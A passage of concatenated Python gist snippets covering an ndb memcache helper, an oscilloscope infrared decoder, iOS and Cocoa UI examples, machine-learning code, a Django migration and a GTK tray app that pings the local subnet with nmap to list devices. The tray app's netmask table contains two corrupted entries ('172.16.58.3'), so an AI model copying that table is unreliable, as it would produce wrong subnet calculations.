# Any keys that are missing, use ndb to get them from the datastore.
# Potentially could be faster by also skipping ndb here and doing a lower-level get_multi to the datastore, but too much work.
keys_to_fetch_from_datastore = [key for mkey, key in mkey_to_key.iteritems() if mkey not in memcache_response and key not in keys_from_context_cache]
datastore_fetch_futures = ndb.get_multi_async(keys_to_fetch_from_datastore, use_memcache=False)
# Check if any results appeared in the context cache while memcache RPC was running.
late_results_from_context_cache = _get_from_context_cache(mkey_to_key.values())
if late_results_from_context_cache:
# Drop the corresponding memcache results, no need to deserialize twice.
for entity in late_results_from_context_cache:
memcache_response.pop(entity.key.urlsafe(), None)
# Deserialize the memcache results.
deserialized_memcache_entities = []
for mkey, mvalue in memcache_response.iteritems():
key = mkey_to_key[mkey]
if mvalue not in (ndb.context._LOCKED, None):
cls = model.Model._lookup_model(key.kind(), ctx._conn.adapter.default_model)
pb = entity_pb.EntityProto()
try:
pb.MergePartialFromString(mvalue)
except ProtocolBuffer.ProtocolBufferDecodeError:
logging.warning('Corrupt memcache entry found '
'with key %s and namespace %s' % (mkey, ns))
else:
entity = cls._from_pb(pb)
# Store the key on the entity since it wasn't written to memcache.
entity._key = key
if ctx._use_cache(key):
# Update in-memory cache.
ctx._cache[key] = entity
deserialized_memcache_entities.append(entity)
# Wait for datastore fetch of entities which were not in memcache.
ndb.Future.wait_all(datastore_fetch_futures)
entities_from_datastore = map(lambda r : r.get_result(), datastore_fetch_futures)
# For any keys which were not in memcache, write them to memcache.
# For a little extra speed, you could make this last call asynchronous and rely on caller to set @ndb.toplevel
entities_to_write_to_memcache = [e for e in entities_from_datastore if e]
ndb.put_multi(entities_to_write_to_memcache, use_datastore=False, use_cache=False)
all_results = (results_from_context_cache + late_results_from_context_cache +
deserialized_memcache_entities + entities_from_datastore)
# Order results to match keys requested.
key_to_entity = {entity.key : entity for entity in all_results if entity}
return [key_to_entity.get(k) for k in keys]
def _get_from_context_cache(keys):
"""Get from ndb context cache"""
ctx = ndb.get_context()
results = []
for key in keys:
if ctx._use_cache(key) and key in ctx._cache:
entity = ctx._cache[key]
if entity and entity._key == key:
results.append(entity)
return results
def test_get_multi(keys):
"""Check get_multi is identical to ndb get_multi"""
entities = get_multi(keys)
ndb_entities = ndb.get_multi(keys)
returned_entity_keys = set([e.key.id() for e in entities])
ndb_returned_entity_keys = set([e.key.id() for e in ndb_entities])
assert(returned_entity_keys == ndb_returned_entity_keys)
```
#### File: hard-gists/6027183/snippet.py
```python
import array
import sys
import time
import visa
# Get the USB device, e.g. 'USB0::0x1AB1::0x0588::DS1ED141904883'
instruments = visa.get_instruments_list()
usb = filter(lambda x: 'USB' in x, instruments)
if len(usb) != 1:
print 'Bad instrument list', instruments
sys.exit(-1)
scope = visa.instrument(usb[0], timeout=20, chunk_size=1024000) # bigger timeout for long mem
# Oscilloscope can get confused if too many commands arrive too fast
def scopewrite(str):
scope.write(str)
time.sleep(.1)
# Set the scope the way we want it
scopewrite(':ACQ:MEMD LONG') # Long memory type
scopewrite(':CHAN1:COUP DC') # DC coupling
scopewrite(':CHAN1:DISP ON') # Channel 1 on
scopewrite(':CHAN2:DISP OFF') # Channel 1 off
scopewrite(':CHAN1:SCAL 1') # Channel 1 vertical scale 1 volts
scopewrite(':CHAN1:OFFS -2') # Channel 1 vertical offset 2 volts
scopewrite(':TIM:SCAL .01') # 10ms time interval
scopewrite(':TIM:OFFS .05') # Offset time 50 ms
scopewrite(':TRIG:EDGE:SOUR CHAN1') # Edge-trigger from channel 1
scopewrite(':TRIG:EDGE:SWE SING') # Single trigger
scopewrite(':TRIG:EDGE:COUP DC') # DC trigger coupling
scopewrite(':TRIG:EDGE:SLOP NEG') # Trigger on negative edge
scopewrite(':TRIG:EDGE:LEV 2.5') # Trigger at 2.5 volts
# Get the sample rate for processing the input data
sample_rate = scope.ask_for_values(':ACQ:SAMP?')[0]
while 1:
scopewrite(":RUN")
while scope.ask(':TRIG:STAT?') != 'STOP':
time.sleep(.2)
# Grab the raw data from channel 1, which will take about 10 seconds
scopewrite(":STOP")
scopewrite(":WAV:POIN:MODE RAW")
rawdata = scope.ask(":WAV:DATA? CHAN1")
# Convert data into high/low values, keeping in mind that rawdata is inverted
# First 10 bytes are header
data = array.array('B', rawdata[10:])
data = map(lambda x: x < 128, data)
# Decode an IR signal in NEC protocol
# For an explanation, see
# http://wiki.altium.com/display/ADOH/NEC+Infrared+Transmission+Protocol
def decode():
# Process data into list of milliseconds high, milliseconds low, milliseconds high, etc.
regions = []
state = data[0]
pos = 0
for i in range(1, len(data)):
if data[i] != state:
regions.append((i - pos) * 1000. / sample_rate)
pos = i
state = data[i]
if len(regions) < 64 or data[0] != True:
raise Exception('Wrong number of regions: %s' % regions)
# Make sure the received length is within 30% of the expected length
# Otherwise throw an exception
def expect(received, expected):
if received < .7 * expected or received > 1.3 * expected:
raise Exception('Wanted length %f vs %f\n%s' % (received, expected, regions))
# Process the header and 32 bits of data in the IR message
result = 0
expect(regions[1], 9) # 9 ms header mark
expect(regions[2], 4.5) # 4.5ms header space
for i in range(0, 32): # Loop over 32 bits
expect(regions[3 + 2*i], .5625) # 562.5 microseconds mark
if regions[4 + 2*i] > 1.000: # If more than 1 millisecond, must be a 1
expect(regions[4 + 2*i], 1.6875) # 1.6875ms mark for 1 bit
result = (result << 1) | 1
else:
expect(regions[4 + 2*i], .5625) # 562.5 us mark for 0 bit
result = result << 1
return result
try:
print '%x' % decode()
except Exception, e:
print 'Decode failed', e
```
#### File: hard-gists/60bacd65c89e5290f452/snippet.py
```python
from objc_util import *
## this is bad python styling, but I justify it by saying the
## function is an alias for the UIColor class
def UIColor(red=1.0, green=1.0, blue=1.0, alpha=1.0):
UIColor = ObjCClass('UIColor')
r = CGFloat(red)
g = CGFloat(green)
b = CGFloat(blue)
a = CGFloat(alpha)
return UIColor.colorWithRed_green_blue_alpha_(r,g,b,a)
## same goes for this function.
def UIImage(image_string):
from scene import get_image_path
UIImage = ObjCClass('UIImage')
img = UIImage.imageWithContentsOfFile_(get_image_path(image_string))
return img
## Just convenience class for progress view styles
class ProgressViewStyle:
DEFAULT = 0
BAR = 1
class ProgressView(ui.View):
@on_main_thread
def __init__(self, animated=True, *args, **kwargs):
ui.View.__init__(self, *args, **kwargs)
objc_view = ObjCInstance(self._objc_ptr)
UIProgressView = ObjCClass('UIProgressView')
f = CGRect(CGPoint(0, 0), CGSize(self.width, self.height))
progress_view = UIProgressView.alloc().initWithProgressViewStyle_(0)
progress_view.setFrame_(f)
progress_view.setBackgroundColor_(UIColor(*self.background_color))
flex_width, flex_height = (1<<1), (1<<4)
progress_view.setAutoresizingMask_(flex_width|flex_height)
progress_view.autorelease()
objc_view.addSubview_(progress_view)
self.progress_view = progress_view
self.animated = animated
@property
@on_main_thread
def progress(self):
progress_view = self.progress_view
progress = progress_view.progress()
return progress
@progress.setter
@on_main_thread
def progress(self,progress):
progress_view = self.progress_view
progress_view.setProgress_animated_(c_float(progress), self.animated)
@property
@on_main_thread
def progress_tint_color(self):
progress_view = self.progress_view
color = progress_view.progressTintColor()
return color
@progress_tint_color.setter
@on_main_thread
def progress_tint_color(self, color):
progress_view = self.progress_view
progress_view.setProgressTintColor_(UIColor(*color))
@property
@on_main_thread
def progress_image(self):
progress_view = self.progress_view
image = progress_view.progressImage()
return image
@progress_image.setter
@on_main_thread
def progress_image(self, image_string):
progress_view = self.progress_view
progress_view.setProgressImage_(UIImage(image_string))
@property
@on_main_thread
def track_tint_color(self):
progress_view = self.progress_view
color = progress_view.trackTintColor()
return color
@track_tint_color.setter
@on_main_thread
def track_tint_color(self, color):
progress_view = self.progress_view
progress_view.setTrackTintColor_(UIColor(*color))
@property
@on_main_thread
def progress_view_style(self):
progress_view = self.progress_view
return progress_view.progressViewStyle()
@progress_view_style.setter
@on_main_thread
def progress_view_style(self, style):
progress_view = self.progress_view
progress_view.setProgressViewStyle_(style)
def main():
import time
progress_view = ProgressView(frame=(0,0,300,50))
progress_view.name = 'Progress View Example'
progress_view.track_tint_color = (1.,0,0)
progress_view.progress_tint_color = (0,1.,0)
progress_view.present('sheet')
progress_view.progress = 0.0
for i in range(101):
progress_view.progress = i/100.
print 'Track Color:', progress_view.track_tint_color
print 'Progress Color:', progress_view.progress_tint_color
## commented out because I don't like the image I used and changing
## the style didn't seem to do anything
#progress_view.progress_image = 'test:Lenna'
#progress_view.progress_view_style = ProgressViewStyle.BAR
progress_view.progress = 0.0
for i in range(101):
progress_view.progress = i/100.
print 'Progress Image:', progress_view.progress_image
print 'Animated:', progress_view.animated
if __name__ == '__main__':
## Uncomment to show what other function are available
#UIProgressView = ObjCClass('UIProgressView')
#print dir(UIProgressView.alloc())
main()
```
#### File: hard-gists/6105220/snippet.py
```python
import sys
import os
# We need to import the relvant object definitions from PyObjC
from AppKit import *
from PyObjCTools import AppHelper
# Cocoa prefers composition to inheritance. The members of an object's
# delegate will be called upon the happening of certain events. Once we define
# methods with particular names, they will be called automatically
class Delegate (NSObject):
def applicationDidFinishLaunching_(self, aNotification):
'''Called automatically when the application has launched'''
print "Hello, World!"
def windowWillClose_(self, aNotification):
'''Called automatically when the window is closed'''
print "Window has been closed"
# Terminate the application
NSApp().terminate_(self)
def main():
# Create a new application instance ...
a=NSApplication.sharedApplication()
# ... and create its delgate. Note the use of the
# Objective C constructors below, because Delegate
# is a subcalss of an Objective C class, NSObject
delegate = Delegate.alloc().init()
# Tell the application which delegate object to use.
a.setDelegate_(delegate)
# Now we can can start to create the window ...
frame = ((200.0, 300.0), (250.0, 100.0))
# (Don't worry about these parameters for the moment. They just specify
# the type of window, its size and position etc)
w = NSWindow.alloc().initWithContentRect_styleMask_backing_defer_(frame, 15, 2, 0)
# ... tell it which delegate object to use (here it happens
# to be the same delegate as the application is using)...
w.setDelegate_(delegate)
# ... and set some properties. Unicode strings are preferred.
w.setTitle_(u'Hello, World!')
# All set. Now we can show the window ...
w.orderFrontRegardless()
# ... and start the application
AppHelper.runEventLoop()
if __name__ == '__main__':
main()
```
#### File: hard-gists/6165747/snippet.py
```python
from numba import jit
import numpy as np
import scipy.sparse as sp
from sklearn.base import BaseEstimator, ClassifierMixin
from sklearn.preprocessing import LabelEncoder
from sklearn.utils.extmath import safe_sparse_dot
@jit("void(f8[:], i4[:], f8, f8[:])")
def _inv_step_sizes(X_data, X_indptr, scale, out):
"""Compute the block-wise inverse step sizes (Lipschitz constants)."""
n_features = out.shape[0]
for j in xrange(n_features):
sqnorm = 0
for k in xrange(X_indptr[j], X_indptr[j+1]):
sqnorm += X_data[k] * X_data[k]
out[j] = scale * sqnorm
@jit("void(f8[:], i4[:], i4[:], i4[:], f8[:,:], i4, f8, f8[:])")
def _grad(X_data, X_indices, X_indptr, y, A, j, C, out):
"""Compute the partial gradient for the j^th block
(vector of size n_classes)."""
n_classes = out.shape[0]
for r in xrange(n_classes):
for k in xrange(X_indptr[j], X_indptr[j+1]):
i = X_indices[k]
if y[i] == r:
continue
if A[r, i] > 0:
out[y[i]] -= 2 * C * A[r, i] * X_data[k]
out[r] += 2 * C * A[r, i] * X_data[k]
@jit("void(f8[:], i4, f8, f8, f8[:], f8[:, :])")
def _update_coef(grad, j, step_size, alpha, update, coef):
"""Update the j^th block of the coefficient matrix."""
n_classes = grad.shape[0]
update_norm = 0
for r in xrange(n_classes):
update[r] = coef[r, j] - step_size * grad[r]
update_norm += update[r] * update[r]
update_norm = np.sqrt(update_norm)
mu = alpha * step_size
scale = 1 - mu / update_norm
if scale < 0:
scale = 0
for r in xrange(n_classes):
old = coef[r, j]
coef[r, j] = scale * update[r]
update[r] = coef[r, j] - old
@jit("void(f8[:], i4[:], i4[:], i4[:], i4, f8[:], f8[:, :])")
def _update_A(X_data, X_indices, X_indptr, y, j, update, A):
"""Update matrix A (see paper)."""
n_classes = A.shape[0]
for r in xrange(n_classes):
for k in xrange(X_indptr[j], X_indptr[j+1]):
i = X_indices[k]
if y[i] == r:
continue
A[r, i] += (update[r] - update[y[i]]) * X_data[k]
@jit("f8(f8[:], f8[:], i4, f8)")
def _violation(grad, coef, j, alpha):
"""Compute optimality violation for the j^th block."""
n_classes = grad.shape[0]
coef_norm = 0
grad_norm = 0
for r in xrange(n_classes):
coef_norm += coef[r, j] * coef[r, j]
grad_norm += grad[r] * grad[r]
grad_norm = np.sqrt(grad_norm)
if coef_norm == 0:
violation = max(grad_norm - alpha, 0)
else:
violation = np.abs(grad_norm - alpha)
return violation
@jit("void(f8[:], i4[:], i4[:], i4[:], i4, f8, f8, f8, i4, f8[:,:])")
def _fit(X_data, X_indices, X_indptr, y, max_iter, alpha, C, tol,
verbose, coef):
n_samples = y.shape[0]
n_classes, n_features = coef.shape
inv_step_sizes = np.zeros(n_features, dtype=np.float64)
_inv_step_sizes(X_data, X_indptr, C * 4 * (n_classes-1), inv_step_sizes)
grad = np.zeros(n_classes, dtype=np.float64)
update = np.zeros(n_classes, dtype=np.float64)
A = np.ones((n_classes, n_samples), dtype=np.float64)
rs = np.random.RandomState(None)
violation_init = 0
for it in xrange(max_iter):
violation_max = 0
for _ in xrange(n_features):
j = rs.randint(n_features-1)
if inv_step_sizes[j] == 0:
continue
grad.fill(0)
_grad(X_data, X_indices, X_indptr, y, A, j, C, grad)
violation = _violation(grad, coef, j, alpha)
_update_coef(grad, j, 1. / inv_step_sizes[j], alpha, update, coef)
_update_A(X_data, X_indices, X_indptr, y, j, update, A)
if violation > violation_max:
violation_max = violation
if it == 0:
violation_init = violation_max
if verbose >= 1:
print violation_max / violation_init
if violation_max / violation_init < tol:
if verbose >= 1:
print "Converged at iter", it + 1
break
class SparseMulticlassClassifier(BaseEstimator, ClassifierMixin):
def __init__(self, alpha=1, C=1, max_iter=20, tol=0.05, verbose=0):
self.alpha = alpha
self.C = C
self.max_iter = max_iter
self.tol = tol
self.verbose = verbose
def fit(self, X, y):
X = sp.csc_matrix(X)
n_samples, n_features = X.shape
self._enc = LabelEncoder()
y = self._enc.fit_transform(y).astype(np.int32)
n_classes = len(self._enc.classes_)
self.coef_ = np.zeros((n_classes, n_features), dtype=np.float64)
_fit(X.data, X.indices, X.indptr, y, self.max_iter,
self.alpha, self.C, self.tol, self.verbose, self.coef_)
return self
def decision_function(self, X):
return safe_sparse_dot(X, self.coef_.T)
def predict(self, X):
pred = self.decision_function(X)
pred = np.argmax(pred, axis=1)
return self._enc.inverse_transform(pred)
def n_nonzero(self, percentage=False):
n_nz = np.sum(np.sum(self.coef_ != 0, axis=0, dtype=bool))
if percentage:
n_nz /= float(self.coef_.shape[1])
return n_nz
if __name__ == '__main__':
import time
from sklearn.datasets import fetch_20newsgroups_vectorized
bunch = fetch_20newsgroups_vectorized(subset="all")
X = bunch.data
y = bunch.target
print X.shape
s = time.time()
clf = SparseMulticlassClassifier(C=1./X.shape[0], alpha=1e-4, tol=1e-3,
max_iter=20, verbose=0)
clf.fit(X, y)
training_time = time.time() - s
print "Numba"
print training_time
print clf.score(X, y)
print clf.n_nonzero(percentage=True)
print
from lightning.primal_cd import CDClassifier
clf = CDClassifier(C=1./X.shape[0], alpha=1e-4, tol=1e-3, max_iter=20,
multiclass=True, penalty="l1/l2", shrinking=False,
max_steps=0, selection="uniform", verbose=0)
s = time.time()
clf.fit(X, y)
training_time = time.time() - s
print "Cython"
print training_time
print clf.score(X, y)
print clf.n_nonzero(percentage=True)
print
```
#### File: hard-gists/6168003/snippet.py
```python
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
from django.db.models import get_app, get_models
class Migration(SchemaMigration):
# old_name => new_name
apps_to_rename = {
'some_old_app' : 'some_new_app',
'another_old_app' : 'another_new_app'
}
def forwards(self, orm):
for old_appname, new_appname in self.apps_to_rename.items():
# Renaming model from 'Foo' to 'Bar'
db.execute("UPDATE south_migrationhistory SET app_name = %s WHERE app_name = %s", [new_appname, old_appname])
db.execute("UPDATE django_content_type SET app_label = %s WHERE app_label = %s", [new_appname, old_appname])
app = get_app(new_appname)
for model in get_models(app, include_auto_created=True):
if model._meta.proxy == True:
continue
new_table_name = model._meta.db_table
old_table_name = old_appname + new_table_name[len(new_appname):]
db.rename_table(old_table_name, new_table_name)
def backwards(self, orm):
for old_appname, new_appname in self.apps_to_rename.items():
# Renaming model from 'Foo' to 'Bar'
db.execute("UPDATE south_migrationhistory SET app_name = %s WHERE app_name = %s", [old_appname, new_appname])
db.execute("UPDATE django_content_type SET app_label = %s WHERE app_label = %s", [old_appname, new_appname])
app = get_app(new_appname)
for model in get_models(app, include_auto_created=True):
if model._meta.proxy == True:
continue
old_table_name = model._meta.db_table
new_table_name = old_appname + old_table_name[len(new_appname):]
db.rename_table(old_table_name, new_table_name)
```
#### File: hard-gists/6201049/snippet.py
```python
import os, gtk, gobject, time, appindicator, subprocess, time, pynotify, threading
gobject.threads_init()
bits_raw = """32 255.255.255.255
31 255.255.255.254
30 255.255.255.252
29 255.255.255.248
28 255.255.255.240
27 255.255.255.224
26 255.255.255.192
25 255.255.255.128
24 255.255.255.0
23 255.255.254.0
22 255.255.252.0
21 255.255.248.0
20 255.255.240.0
19 255.255.224.0
18 255.255.192.0
17 255.255.128.0
16 255.255.0.0
15 255.254.0.0
14 255.252.0.0
13 255.248.0.0
12 255.240.0.0
11 255.224.0.0
10 255.192.0.0
9 255.128.0.0
8 255.0.0.0
7 254.0.0.0
6 252.0.0.0
5 248.0.0.0
4 240.0.0.0
3 172.16.58.3
2 192.0.0.0
1 172.16.58.3
0 0.0.0.0"""
bits = {}
for bit in bits_raw.split("\n"):
v,k = bit.split(" ")
bits[k] = v
show_notifications = True
def switch_show_notifications(checkmenuitem):
global show_notifications
show_notifications = checkmenuitem.get_active()
hosts_notifier_ar = []
def hosts_notifier(hosts):
global hosts_notifier_ar
new_hosts = []
disconnected_hosts = []
for host in hosts:
if not host in hosts_notifier_ar:
new_hosts.append(host)
hosts_notifier_ar += new_hosts
for host in hosts_notifier_ar:
if not host in hosts:
disconnected_hosts.append(host)
for host in disconnected_hosts:
hosts_notifier_ar.remove(host)
if show_notifications:
notification_message = ""
if len(new_hosts)==1:
notification_message += "One new device joined network ("+new_hosts[0]+")\n"
elif len(new_hosts)>1:
notification_message += str(len(new_hosts))+" New devices joined network\n"
if len(disconnected_hosts)==1:
notification_message += "One device disconnected from network ("+disconnected_hosts[0]+")\n"
elif len(disconnected_hosts)>1:
notification_message += str(len(disconnected_hosts))+" Devices disconnected from network\n"
if notification_message!="":
n = pynotify.Notification("Nadar", notification_message.strip())
helper = gtk.Button()
icon = helper.render_icon(gtk.STOCK_NETWORK, gtk.ICON_SIZE_DIALOG)
n.set_icon_from_pixbuf(icon)
n.show()
def get_interfaces():
# ifconfig -s
ifconfig = subprocess.check_output(['ifconfig','-s'])
devices = []
for line in ifconfig.split("\n")[1:-1]:
device = line.split(" ")[0]
if device!="lo": # add al interfaces except loopback
devices.append(device)
return devices
def get_ip_mask(device):
# ifconfig eth0
ifconfig = subprocess.check_output(['ifconfig', device])
for line in ifconfig.split("\n"):
current_line = line.strip()
if current_line.startswith('inet addr'):
components = [x for x in current_line.strip().split(' ') if len(x)>0]
ip_address = components[0].split(':')[1]
subnet_mask = components[2].split(':')[1]
if bits.has_key(subnet_mask):
return (ip_address,bits[subnet_mask])
return False
def get_default_gateways():
# nm-tool | grep Gateway | awk '{print $2}'
# man, i love that line :D it feels like magic
return [ x.strip().split(" ")[-1] for x in subprocess.check_output('nm-tool').split("\n") if x.find("Gateway")>-1 ]
def get_hosts(device):
# nmap -sn ip/bits
try:
ip_mask = get_ip_mask(device)
arp_scan = subprocess.check_output(['nmap', '-sn', ip_mask[0]+'/'+ip_mask[1]])
gateways = get_default_gateways()
hosts = []
for line in arp_scan.split("\n"):
# filter lines to the ip lines only
if line.startswith('Nmap scan report for '):
host = line[line.rfind(' ')+1:]
# don't add current machine ip address and don't add gateways
if host!=ip_mask[0] and not host in gateways:
hosts.append(host)
return hosts
except Exception as e:
return []
def control_menu_items(menu_obj):
separator = gtk.SeparatorMenuItem()
menu_obj.append(separator)
separator.show()
show_notifications_menuitem = gtk.CheckMenuItem("Show notifications")
show_notifications_menuitem.set_active(show_notifications)
show_notifications_menuitem.connect('toggled', switch_show_notifications)
menu_obj.append(show_notifications_menuitem)
show_notifications_menuitem.show()
quit_item = gtk.MenuItem("Exit")
quit_item.connect('activate', gtk.main_quit)
menu_obj.append(quit_item)
quit_item.show()
class Refresh_menu(threading.Thread):
def __init__(self, devices, menu):
super(Refresh_menu, self).__init__()
self.quit = False
self.hosts = []
self.devices = devices
self.menu = menu
def update_menu(self):
for i in self.menu.get_children():
self.menu.remove(i)
for host in self.hosts:
menu_item = gtk.MenuItem(host)
self.menu.append(menu_item)
menu_item.show()
control_menu_items(self.menu)
hosts_notifier(self.hosts)
return False
def run(self):
while not self.quit:
self.refresh_hosts()
gobject.idle_add(self.update_menu)
time.sleep(5)
def refresh_hosts(self):
self.hosts = []
for device in self.devices:
if not self.quit:
self.hosts += get_hosts(device)
return False
devices = get_interfaces()
menu = gtk.Menu()
control_menu_items(menu)
ind = appindicator.Indicator ("nadar",
"preferences-system-network",
appindicator.CATEGORY_APPLICATION_STATUS)
ind.set_status (appindicator.STATUS_ACTIVE)
ind.set_menu(menu)
pynotify.init("Nadar")
t = Refresh_menu(devices, menu)
t.start()
gtk.main()
os._exit(0)
```
#### File: hard-gists/6327611/snippet.py
```python
import Image
#Created by vvdr12
#Fully open license. Have fun.
#change threshold value in 'def contrastpoints' for higher/lower line density.
#put a 'test.jpg' file in the same folder as the code.
#_functions______________________________________________
def contrastpoints(x,j,img):
threshold=20
contrast=[]
i=0
l2=1
while l2==1:
r1=img[i,j][0]
b1=img[i,j][1]
g1=img[i,j][2]
ave1=((r1+b1+g1)/3)
r2=img[(i+1),j][0]
b2=img[(i+1),j][1]
g2=img[(i+1),j][2]
ave2=((r2+b2+g2)/3)
r3=img[(i+2),j][0]
b3=img[(i+2),j][1]
g3=img[(i+2),j][2]
ave3=((r3+b3+g3)/3)
r4=img[(i+3),j][0]
b4=img[(i+3),j][1]
g4=img[(i+3),j][2]
ave4=((r4+b4+g4)/3)
if abs(ave2-ave1)>threshold:
if abs(ave1-ave3)>(threshold/2):
contrast.append(i)
i=i+1
if i==(x-3):
l2=0
return contrast
#_Page_Setup____________________________________________
source = Image.open("test.jpg")
img = source.load()
print source.format
print source.size
print source.mode
x = source.size[0]
y = source.size[1]
#_______________________________________________________
i=0
j=0#set to 500 for short test run
k=0
l=0
m=0 #contrast func
l1=1
contrast=contrastpoints(x,j,img) #contrast func
print "\n", j, "/", y
while (l1==1):
if len(contrast)>m: #contrast func
if i>=contrast[m]:
img[i,j]=(0,0,0)
m=m+1
i=i+1
if i==(x-1):
contrast=contrastpoints(x,j,img) #contrast func
m=0 #contrast func
i=0
k=k+1
if k==1:
k=0
j=j+1
print j, "/",y
if j==y: #set to 510 for short test run
l1=0
source.save("japanify.png")
```
#### File: hard-gists/6454814/snippet.py
```python
from pyspark import SparkContext
import numpy as np
from sklearn.cross_validation import train_test_split, Bootstrap
from sklearn.datasets import make_classification
from sklearn.metrics import accuracy_score
from sklearn.tree import DecisionTreeClassifier
def run(sc):
def zero_matrix(n, m):
return np.zeros(n*m, dtype = int).reshape(n, m)
def vote_increment(y_est):
increment = zero_matrix(y_est.size, n_ys)
increment[np.arange(y_est.size), y_est] = 1
return increment # test point x class matrix with 1s marking the estimator prediction
X, y = make_classification()
X_train, X_test, y_train, y_test = train_test_split(X, y)
n_test = X_test.shape[0]
n_ys = np.unique(y_train).size
model = DecisionTreeClassifier()
# Partition the training data into random sub-samples with replacement.
samples = sc.parallelize(Bootstrap(y.size))
# Train a model for each sub-sample and apply it to the test data.
vote_tally = samples.map(lambda (index, _):
model.fit(X[index], y[index]).predict(X_test)
).map(vote_increment).fold(zero_matrix(n_test, n_ys), np.add) # Take the learner majority vote.
y_estimate_vote = np.argmax(vote_tally, axis = 1)
return accuracy_score(y_test, y_estimate_vote)
if __name__ == '__main__':
print run(SparkContext("local", "Boost"))
```
#### File: hard-gists/651afb13d45e4c587f63/snippet.py
```python
import random
import numpy as np
from scipy.stats import norm
import time
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib.gridspec as gridspec
# From Theano tutorial - MNIST dataset
from logistic_sgd import load_data
import theano
import theano.tensor as T
start_time = time.time()
n_latent = 10
n_hidden = 500
n_input = 28*28
# Right now the code only works with one expectation (like the article), but this can be easily fixed
n_expectations = 1
batch_size = 100
n_epochs = 25000
random.seed(0)
np.random.seed(1)
# The functions below were adapted from the amazing Theano tutorial by Newmu
# https://github.com/Newmu/Theano-Tutorials
def floatX(X):
return np.asarray(X, dtype=theano.config.floatX)
def init_weights(shape):
return theano.shared(floatX(np.random.randn(*shape) * 0.01))
def sgd(cost, params, lr=0.05, momentum = 0.9):
grads = T.grad(cost=cost, wrt=params)
updates = []
for p, g in zip(params, grads):
acc = theano.shared(p.get_value() * 0.)
acc_new = acc*momentum + (1.0-momentum)*g
updates.append([acc, acc_new])
updates.append([p, p - acc_new * lr])
return updates
def adagrad(cost, params, lr=0.001, epsilon=1e-6):
grads = T.grad(cost=cost, wrt=params)
updates = []
for p, g in zip(params, grads):
acc = theano.shared(p.get_value() * 0.)
acc_new = acc + g ** 2
gradient_scaling = T.sqrt(acc_new + epsilon)
g = g / gradient_scaling
updates.append((acc, acc_new))
updates.append((p, p - lr * g))
return updates
def RMSprop(cost, params, lr=0.001, rho=0.9, epsilon=1e-6):
grads = T.grad(cost=cost, wrt=params)
updates = []
for p, g in zip(params, grads):
acc = theano.shared(p.get_value() * 0.)
acc_new = rho * acc + (1 - rho) * g ** 2
gradient_scaling = T.sqrt(acc_new + epsilon)
g = g / gradient_scaling
updates.append((acc, acc_new))
updates.append((p, p - lr * g))
return updates
# Parameters
# Gaussian MLP weights and biases (encoder)
gaussian_bh = init_weights((n_hidden, ))
mu_bo = init_weights((n_latent, ))
sigma_bo = init_weights((n_latent, ))
gaussian_Wh = init_weights((n_input, n_hidden))
mu_Wo = init_weights((n_hidden, n_latent))
sigma_Wo = init_weights((n_hidden, n_latent))
# Bernoulli MLP weights and biases (decoder)
bernoulli_bh = init_weights((n_hidden, ))
bernoulli_bo = init_weights((n_input, ))
bernoulli_Wh = init_weights((n_latent, n_hidden))
bernoulli_Wo = init_weights((n_hidden, n_input))
# Only the weight matrices W will be regularized (weight decay)
W = [gaussian_Wh, mu_Wo, sigma_Wo, bernoulli_Wh, bernoulli_Wo]
b = [gaussian_bh, mu_bo, sigma_bo, bernoulli_bh, bernoulli_bo]
params = W + b
# Gaussian Encoder
x = T.matrix("x")
h_encoder = T.tanh(T.dot(x, gaussian_Wh) + gaussian_bh)
mu = T.dot(h_encoder, mu_Wo) + mu_bo
log_sigma = 0.5*(T.dot(h_encoder, sigma_Wo) + sigma_bo)
# This expression is simple (not an expectation) because we're using normal priors and posteriors
DKL = (1.0 + 2.0*log_sigma - mu**2 - T.exp(2.0*log_sigma)).sum(axis = 1)/2.0
# Bernoulli Decoder
std_normal = T.matrix("std_normal")
z = mu + T.exp(log_sigma)*std_normal
h_decoder = T.tanh(T.dot(z, bernoulli_Wh) + bernoulli_bh)
y = T.nnet.sigmoid(T.dot(h_decoder, bernoulli_Wo) + bernoulli_bo)
log_likelihood = -T.nnet.binary_crossentropy(y, x).sum(axis = 1)
# Lower bound
lower_bound = -(DKL + log_likelihood).mean()
# Weight decay
L2 = sum([(w**2).sum() for w in W])
cost = lower_bound + batch_size/50000.0/2.0*L2
#updates = sgd(lower_bound, params, lr = 0.001)
updates = RMSprop(cost, params, lr=0.001)
#updates = adagrad(lower_bound, params, lr=0.02)
train_model = theano.function(inputs=[x, std_normal],
outputs=cost,
updates=updates,
mode='FAST_RUN',
allow_input_downcast=True)
eval_model = theano.function(inputs=[x, std_normal], outputs=lower_bound,
mode='FAST_RUN',
allow_input_downcast=True)
print("--- %s seconds ---" % (time.time() - start_time))
start_time = time.time()
# Load MNIST and binarize it
datasets = load_data('mnist.pkl.gz')
train_x, _ = datasets[0]
train_x = 1.0*(train_x > 0.5)
val_x, _ = datasets[1]
val_x = 1.0*(val_x > 0.5)
tx = theano.function([], T.concatenate([train_x, val_x]))()
# Using the test set as validation
tst_x, _ = datasets[2]
tst_x = 1.0*(tst_x > 0.5)
vx = theano.function([], tst_x)()
print("--- %s seconds ---" % (time.time() - start_time))
start_time = time.time()
training = []
validation = []
for i in range(n_epochs):
minibatch_train = [ tx[j] for j in random.sample(xrange(len(tx)), batch_size) ]
val_cost = eval_model(vx, np.random.normal(size = (len(vx), n_latent)))
train_cost = train_model(minibatch_train, np.random.normal(size = (batch_size, n_latent)))
print "epoch", i, "train", train_cost, "val", val_cost
training.append(train_cost)
validation.append(val_cost)
plt.subplot(211)
plt.ylabel("-Lower bound")
plt.xlabel("Minibatch (" + str(batch_size) + " samples)")
plt.plot(training, label = "Train")
plt.legend()
plt.subplot(212)
plt.ylabel("-Lower bound")
plt.xlabel("Minibatch (" + str(batch_size) + " samples)")
plt.plot(validation, 'r', label = "Validation")
plt.legend()
plt.show()
print("--- %s seconds ---" % (time.time() - start_time))
start_time = time.time()
# Now let's test the auto-encoder on some visual problems
# "Deterministic" decoder (uses only the mean of the Gaussian encoder)
t = T.vector()
h_mu = T.tanh(T.dot(t, gaussian_Wh) + gaussian_bh)
h_bern = T.tanh(T.dot(T.dot(h_mu, mu_Wo) + mu_bo, bernoulli_Wh) + bernoulli_bh)
yt = T.nnet.sigmoid(T.dot(h_bern, bernoulli_Wo) + bernoulli_bo)
test_input = theano.function([t], yt,
mode='FAST_RUN',
allow_input_downcast=True)
# Reconstruct some random images (with optional salt and peper noise)
salt_pepper = 0.2
plt.figure()#figsize = (5, 2))
